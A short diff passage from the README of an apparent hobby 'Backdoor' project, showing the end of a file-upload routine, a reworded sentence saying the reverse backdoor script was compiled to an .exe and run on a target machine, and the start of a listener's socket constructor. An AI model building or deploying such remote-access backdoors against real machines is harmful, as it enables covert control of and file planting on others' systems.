jezil2210/Backdoor/README.md

             file.write(base64.b64decode(content))
             return "[+] Upload successful."
 ```
-All of this was the .exe that run on the target machine, the listener is almost the same thing of this code, the differences are the constructor of it that open a port to receive the connection from the target machine.
+All of this was the reverse_backdoor.py in format of .exe that was executed on the target machine, the listener is almost the same thing of this code, the differences are the constructor that open a port to receive the connection from the target machine.
 ```python
 def __init__(self, ip, port):
           listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)